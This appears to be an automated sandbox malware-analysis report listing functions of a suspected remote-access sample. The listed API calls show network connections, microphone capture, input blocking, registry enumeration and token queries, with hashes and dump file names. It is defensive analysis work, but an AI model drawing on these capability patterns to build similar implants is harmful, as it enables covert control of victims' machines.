Instruction ID: c40a7aba82008906b23f1e1996f2c44ea210c5d9a3af39e251ea5516931b2029
Opcode Fuzzy Hash: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
Instruction Fuzzy Hash: D8212BB0904B909FD320DF6A8D84A56FBE8FB08740F808D2EE59AD7A00D378A9048F55

Function 1000FF60 Relevance: 12.2, APIs: 8, Instructions: 169sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D

GetCursorPos.USER32(?), ref: 1000FF9A
GetCursorInfo.USER32(?), ref: 1000FFBB
DestroyCursor.USER32(?), ref: 1000FFE4
GetTickCount.KERNEL32 ref: 100100D8
Sleep.KERNEL32(00000001), ref: 100100ED
GetTickCount.KERNEL32 ref: 100100EF
GetTickCount.KERNEL32 ref: 100100FC
InterlockedExchange.KERNEL32(?,00000000), ref: 10010100

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
String ID:
API String ID: 3294368536-0
Opcode ID: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
Instruction ID: 7b30b2465e0484a6c358d486dbc3e3e74d89055d9b4a2f1a32c3f10f469ee35a
Opcode Fuzzy Hash: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
Instruction Fuzzy Hash: 18515E753007459FE724DF28C880A6BB3E6FF88350F144A2DF5868B652DBB1F9858B61

Function 1000E050 Relevance: 12.2, APIs: 8, Instructions: 153registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E06A
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 1000E09C
LocalAlloc.KERNEL32(00000040,?), ref: 1000E0DB
??2@YAPAXI@Z.MSVCRT(?), ref: 1000E118
RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 1000E16D
??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000E1B2
RegCloseKey.ADVAPI32(?), ref: 1000E1BF

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@??3@AllocCloseEnumInfoLocalOpenQuery
String ID:
API String ID: 71355648-0
Opcode ID: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
Instruction ID: 1bdc6b41a68a7066ed18929c9f9129e6b3d940a8bf03ad75385409d59a1399c2
Opcode Fuzzy Hash: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
Instruction Fuzzy Hash: 314190716083556FE314CF28CC84A6BBBE9EBC8750F048A2DFA49D7240D675DD05CBA2

Function 10011650 Relevance: 12.1, APIs: 8, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00020028,?,?,1007B960,76F90440,00000000), ref: 100116A6
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 100116D5
GlobalAlloc.KERNEL32(00000040,?), ref: 100116E2
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10011700
LookupAccountSidA.ADVAPI32 ref: 10011740
LookupAccountSidA.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 10011780
GlobalFree.KERNEL32(00000000), ref: 100117B1
CloseHandle.KERNEL32(?), ref: 100117BC

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Token$AccountGlobalInformationLookup$AllocCloseFreeHandleOpenProcess
String ID:
API String ID: 1197180021-0
Opcode ID: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
Instruction ID: aef5199e8c4097825b2e0746fe6a036d64d1b07520511a5969cee2b76a0b1f35
Opcode Fuzzy Hash: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
Instruction Fuzzy Hash: 714182762083456FE714DF64C8C49AFB7E9FBC8354F01092DF68597280D6B5ED488BA2

Function 0040394B Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403966
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 0040397A
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 004039A6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 004039DE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A00
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A19
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403A2C
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A6A

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
Instruction ID: ad9dd923ed9d3c248ceca5dc3862fa0172e5803eec53910c5ff1caad3bb93819
Opcode Fuzzy Hash: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
Instruction Fuzzy Hash: A831D4B26042116FD7207F796CC483BBE9CE649346B15063BF592F3280D6794E454BA9

Function 10004FF0 Relevance: 12.1, APIs: 8, Instructions: 63networksleepthreadCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 10005000
htons.WS2_32 ref: 10005027
inet_addr.WS2_32(1007DD2C), ref: 10005037
socket.WS2_32(00000002,00000001,00000000), ref: 10005066
connect.WS2_32(00000000,?,00000010), ref: 10005072
Sleep.KERNEL32(00000028), ref: 10005076
closesocket.WS2_32(00000000), ref: 10005079
RtlExitUserThread.NTDLL(00000000), ref: 1000508E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrsocket
String ID:
API String ID: 3058909470-0
Opcode ID: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
Instruction ID: 902ebb94e04e1c7c5fd66402ba9005c87273360587b7ce246dad50b3abbda6e0
Opcode Fuzzy Hash: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
Instruction Fuzzy Hash: 871170711053A4ABF310AF65CC89B6ABBB9FF49B41F00841EF19887291DBB598048B66

Function 10003B70 Relevance: 10.7, APIs: 7, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
Instruction ID: e4da530426af2831799a229c98be5beb60846619531619ef35dcfd8c2b457cff
Opcode Fuzzy Hash: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
Instruction Fuzzy Hash: 5751A875A00544ABEB05DF65CC41BDFB7BEEF85790F00C129F509AB245DB34B90587A1

Function 10004660 Relevance: 10.6, APIs: 7, Instructions: 98threadnetworkCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 10004676
inet_addr.WS2_32(?), ref: 100046A1
gethostbyname.WS2_32(?), ref: 100046AD
inet_ntoa.WS2_32(?), ref: 100046D7
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000474B
CloseHandle.KERNEL32(00000000), ref: 1000474E
CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 1000477A

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandleVersiongethostbynameinet_addrinet_ntoa
String ID:
API String ID: 3347725681-0
Opcode ID: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
Instruction ID: df4bb2cff17a4dad36bc039b66e6a0bfb7aaed8d7346e5ccee572720da75d4d5
Opcode Fuzzy Hash: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
Instruction Fuzzy Hash: A93123722443405BF328DB348C84B2A77E6EB85760F62462DF94A972D0CFB8AC44C609

Function 100087D0 Relevance: 10.6, APIs: 7, Instructions: 96stringfilememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1000881C
GetFileSize.KERNEL32(00000000,?,?,?,?,00000000), ref: 1000883B
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10008844
lstrlen.KERNEL32(?,?,?,00000000), ref: 1000884B
LocalAlloc.KERNEL32(00000040,00000000,?,?,00000000), ref: 10008859
lstrlen.KERNEL32(?,?,?,00000000), ref: 10008887
LocalFree.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 100088AF

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
String ID:
API String ID: 2793549963-0
Opcode ID: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
Instruction ID: aba3aad5fd678ceee709943c066d7c1318fba4e8ca5bf8cd350ee25dca26516d
Opcode Fuzzy Hash: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
Instruction Fuzzy Hash: C621E1327003145FE7089A78EC95A6BB6DAEBC8721F44453DFA02C7380EAF5AD09C760

Function 10005580 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 10005588
gethostbyname.WS2_32(?), ref: 10005594
inet_ntoa.WS2_32(?), ref: 100055BE
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000562C
CloseHandle.KERNEL32(00000000), ref: 1000562F
CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 10005658
CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000566B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID:
API String ID: 772126777-0
Opcode ID: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
Instruction ID: d8acfb67411859da9f326e055f778afd8bf87ba093dd899f6f4e0a5fb8b5cdca
Opcode Fuzzy Hash: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
Instruction Fuzzy Hash: A321D8727403155BF328DB349C95B1B76E2FBC4761F65462DFA52A72D0CEF4AC048618

Function 10005680 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 10005688
gethostbyname.WS2_32(?), ref: 10005694
inet_ntoa.WS2_32(?), ref: 100056BE
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000572C
CloseHandle.KERNEL32(00000000), ref: 1000572F
CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005758
CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 1000576B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID:
API String ID: 772126777-0
Opcode ID: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
Instruction ID: 9488327e99ebaf0692ae378b052773dd40b9acca62f8510c4b65027830434a75
Opcode Fuzzy Hash: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
Instruction Fuzzy Hash: 7F21E4327443156BF324DB349C85B1BB6E2EB84B60F254629FA02AB2D0CEF4AC048618

Function 10005780 Relevance: 10.6, APIs: 7, Instructions: 93threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 10005788
gethostbyname.WS2_32(?), ref: 10005794
inet_ntoa.WS2_32(?), ref: 100057BE
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000582C
CloseHandle.KERNEL32(00000000), ref: 1000582F
CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005858
CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000586B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID:
API String ID: 772126777-0
Opcode ID: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
Instruction ID: 5a4b8bc2c2b8071631b041413c90c1d326417705303120385d25498e08fc0dd5
Opcode Fuzzy Hash: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
Instruction Fuzzy Hash: D121B4727443156BF324DB349C85B1BB6E2EB84B61F254629FA52AB2D0CEF4EC048618

Function 100088D0 Relevance: 10.6, APIs: 7, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,10007EAC,00000001), ref: 10008904

Part of subcall function 100089B0: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,10007EAC,00000001), ref: 100089D4

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??3@CreateFile
String ID:
API String ID: 1804927778-0
Opcode ID: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
Instruction ID: 535a8f0a5c1657d4f4a0f8731bc608884a1cc126f303587fb67b32ffd65e399e
Opcode Fuzzy Hash: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
Instruction Fuzzy Hash: 3D21C176300351ABF310DB65EC88F6BB799EBC5761F10852AF745DB280D6B1A8058771

Function 10002EF0 Relevance: 10.6, APIs: 7, Instructions: 84threadCOMMON

Download Yara Rule

APIs

waveInGetNumDevs.WINMM(?,?,?,10002E20), ref: 10002EF5
CreateThread.KERNEL32(00000000,00000000,10003060,?,00000004,?), ref: 10002F1E
waveInOpen.WINMM(?,0000FFFF,?,00000000,00000000,00020000,?,00000004,?,?,?,?,10002E20), ref: 10002F40

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: wave$CreateDevsOpenThread
String ID:
API String ID: 3981276002-0
Opcode ID: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
Instruction ID: 398045f82957bc6df3ca42976268de9e0ed9c6986921e5dfa378deda77a8059f
Opcode Fuzzy Hash: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
Instruction Fuzzy Hash: 0A216DB5240312AFE314CF68DC84F62B7A9FB89350F204669F645CB685CB71E851CBA0

Function 1000F740 Relevance: 10.6, APIs: 7, Instructions: 84keyboardwindowsleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 1000F78C
SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1000F7A7
SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1000F7BA
SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 1000F7D6
SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1000F7E9

Part of subcall function 1000F260: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
Part of subcall function 1000F260: CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
Part of subcall function 1000F260: ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1

BlockInput.USER32(?), ref: 1000F7F8

Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000000), ref: 1000FB47
Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000001), ref: 1000FB50

BlockInput.USER32(00000000), ref: 1000F82B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: System$BlockInfoInputMessageMetricsParametersSend$??2@CloseHandleObjectSingleSleepWait
String ID:
API String ID: 1415795360-0
Opcode ID: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
Instruction ID: d37ac442a261cbdb69aff6c5209fa7087b7225f6be27279a8c23c941b82a95ba
Opcode Fuzzy Hash: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
Instruction Fuzzy Hash: D521F63434839421F944EB344CA3BBA278ACF85BD4F10053DB6956F9C7CEE1A849B655

Function 10006D90 Relevance: 10.6, APIs: 7, Instructions: 77threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006DE0
CloseHandle.KERNEL32(00000000), ref: 10006DE9
CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006DFA
CloseHandle.KERNEL32(00000000), ref: 10006DFD
CreateThread.KERNEL32(00000000,00000000,Function_00005190,00000000,00000000,00000000), ref: 10006E22
CreateThread.KERNEL32(00000000,00000000,Function_00006AD0,00000000,00000000,00000000), ref: 10006E35
CreateThread.KERNEL32(00000000,00000000,Function_00004940,00000000,00000000,00000000), ref: 10006E48

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
